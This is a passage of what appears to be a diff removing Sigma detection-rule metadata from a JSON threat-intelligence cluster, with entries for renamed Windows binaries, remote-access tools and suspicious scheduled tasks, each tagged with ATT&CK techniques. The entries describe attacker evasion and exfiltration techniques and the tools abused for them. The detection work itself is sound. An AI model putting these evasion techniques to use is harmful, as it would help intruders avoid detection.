"https://twitter.com/mariuszbit/status/1531631015139102720", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" - ], - "tags": [ - "attack.t1528", - "attack.t1036.003" - ] - }, - "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "value": "Process Creation with Renamed BrowserCore.exe" - }, - { - "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_ftp.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", - "value": "Renamed FTP.EXE Binary Execution" - }, - { - "description": "Detects renamed jusched.exe used by cobalt group", - "meta": { - "author": "Markus Neis, Swisscom", - "creation_date": "2019/06/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_jusched.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "value": "Renamed jusched.exe" - }, - { - "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_renamed_mavinject.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" - ] - }, - "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "value": "Rename Mavinject Execution" - }, - { - "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/22", - "falsepositive": [ - "Software that illegaly integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" - ], - "filename": "proc_creation_win_renamed_megasync.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/rclone-mega-extortion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", - "value": "Renamed MegaSync" - }, - { - "description": "Detects process creation with a renamed Msdt.exe", - "meta": { - "author": "pH-T", - "creation_date": "2022/06/03", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_renamed_msdt.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "value": "Renamed Msdt.exe" - }, - { - "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "0afbd410-de03-4078-8491-f132303cb67d", - "value": "Execution of Renamed NetSupport RAT" - }, - { - "description": "Detects execution of renamed paexec via imphash and executable product string", - "meta": { - "author": "Jason Lynch", - "creation_date": "2019/04/17", - "falsepositive": [ - "Unknown imphashes" - ], - "filename": "proc_creation_win_renamed_paexec.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.g0046", - "car.2013-05-009", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", - "value": "Execution of Renamed PaExec" - }, - { - "description": "Execution of a renamed version of the Plink binary", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_plink.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", - "value": "Execution Of Renamed Plink Binary" - }, - { - "description": "Detects the execution of a renamed PowerShell often used by attackers or malware", - "meta": { - "author": "Florian Roth, frack113", - "creation_date": "2019/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_powershell.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/christophetd/status/1164506034720952320", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml" - ], - "tags": [ - "car.2013-05-009", - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", - "value": "Renamed PowerShell" - }, - { - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/11/18", - "falsepositive": [ - "Procdump illegaly bundled with legitimate software", - "Weird admins who renamed binaries (and should be investigated)" - ], - "filename": "proc_creation_win_renamed_procdump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "value": "Renamed ProcDump" - }, - { - "description": "Detects the execution of a renamed PsExec often used by attackers or malware", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/05/21", - "falsepositive": [ - "Software that illegaly integrates PsExec in a renamed form", - "Administrators that have renamed PsExec and no one knows why" - ], - "filename": "proc_creation_win_renamed_psexec.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" - ], - "tags": [ - "car.2013-05-009", - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", - "value": "Renamed PsExec" - }, - { - "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_rundll32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" - ], - "tags": "No established tags" - }, - "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", - "value": "Renamed Rundll32.exe Execution" - }, - { - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "value": "DllRegisterServer Call From Non Rundll32" - }, - { - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_rurat.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" - ] - }, - "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", - "value": "Execution of Renamed Remote Utilities RAT (RURAT)" - }, - { - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/06", - "falsepositive": [ - "System administrator usage" - ], - "filename": "proc_creation_win_renamed_sdelete.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "value": "Renamed Sysinternals Sdelete Usage" - }, - { - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "meta": { - "author": "elhoim", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_vmnat.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/malmoeb/status/1525901219247845376", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", - "value": "Renamed or Portable Vmnat.exe" - }, - { - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_whoami.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ] - }, - "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "value": "Renamed Whoami Execution" - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "meta": { - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "creation_date": "2020/10/10", - "falsepositive": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" - ], - "filename": "proc_creation_win_root_certificate_installed.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ] - }, - "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc", - "value": "Root Certificate Installed" - }, - { - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/13", - "falsepositive": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" - ], - "filename": "proc_creation_win_rpcss_anomalies.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", - "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", - "https://twitter.com/cyb3rops/status/1514217991034097664", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "value": "Remote Procedure Call Service Anomaly" - }, - { - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "meta": { - "author": "CD_ROM_", - "creation_date": "2022/05/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "value": "Rundll32 With Suspicious Parent Process" - }, - { - "description": "load malicious registered COM objects", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", - "value": "Rundll32 Registered COM Objects" - }, - { - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/10", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_rundll32_unc_path.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" - ] - }, - "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "value": "Rundll32 UNC Path Execution" - }, - { - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "meta": { - "author": "Bartlomiej Czyz, Relativity", - "creation_date": "2021/01/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_rundll32_without_parameters.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://bczyz1.github.io/2021/01/30/psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "5bb68627-3198-40ca-b458-49f973db8752", - "value": "Rundll32 Without Parameters" - }, - { - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "meta": { - "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)", - "creation_date": "2022/01/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_executable_invalid_extension.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1481630810495139841?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" - ], - "tags": "No established tags" - }, - "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "value": "Rundll32 Execution Without DLL File" - }, - { - "description": "Payloads may be compressed, archived, or encrypted in order to avoid detection", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_from_zip.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_from_zip.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "1a70042a-6622-4a2b-8958-267625349abf", - "value": "Run from a Zip File" - }, - { - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "meta": { - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "creation_date": "2019/10/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_powershell_script_from_ads.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "value": "Run PowerShell Script from ADS" - }, - { - "description": "Detects PowerShell script execution via input stream redirect", - "meta": { - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", - "creation_date": "2020/10/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", - "https://twitter.com/Moriarty_Meng/status/984380793383370752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "value": "Run PowerShell Script from Redirected Input Stream" - }, - { - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "meta": { - "author": "Janantha Marasinghe", - "creation_date": "2020/09/26", - "falsepositive": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" - ], - "filename": "proc_creation_win_run_virtualbox.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1564/006/", - "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", - "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" - ] - }, - "uuid": "bab049ca-7471-4828-9024-38279a4c04da", - "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" - }, - { - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "meta": { - "author": "pH-T, Nasreddine Bencherchali", - "creation_date": "2022/03/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "value": "Suspicious Schtasks Execution AppData Folder" - }, - { - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "meta": { - "author": "pH-T", - "creation_date": "2022/07/15", - "falsepositive": [ - "Software installation" - ], - "filename": "proc_creation_win_schtasks_once_0000.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" - ], - "tags": "No established tags" - }, - "uuid": "970823b7-273b-460a-8afc-3a6811998529", - "value": "Uncommon Scheduled Task Once 00:00" - }, - { - "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", - "meta": { - "author": "pH-T, Florian Roth", - "creation_date": "2022/04/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "b66474aa-bd92-4333-a16c-298155b120df", - "value": "Suspicious Powershell No File or Command" - }, - { - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "meta": { - "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", - "creation_date": "2022/02/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_reg_loader.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "value": "Scheduled Task Executing Powershell Encoded Payload from Registry" - }, - { - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_schtasks_system.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "value": "Schtasks Creation Or Modification With SYSTEM Privileges" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate usage of the tool" - ], - "filename": "proc_creation_win_screenconnect.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", - "value": "Use of ScreenConnect Remote Access Software" - }, - { - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" - ], - "filename": "proc_creation_win_screenconnect_anomaly.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", - "value": "ScreenConnect Backstage Mode Anomaly" - }, - { - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_script_event_consumer_spawn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "value": "Script Event Consumer Spawning Process" - }, - { - "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to 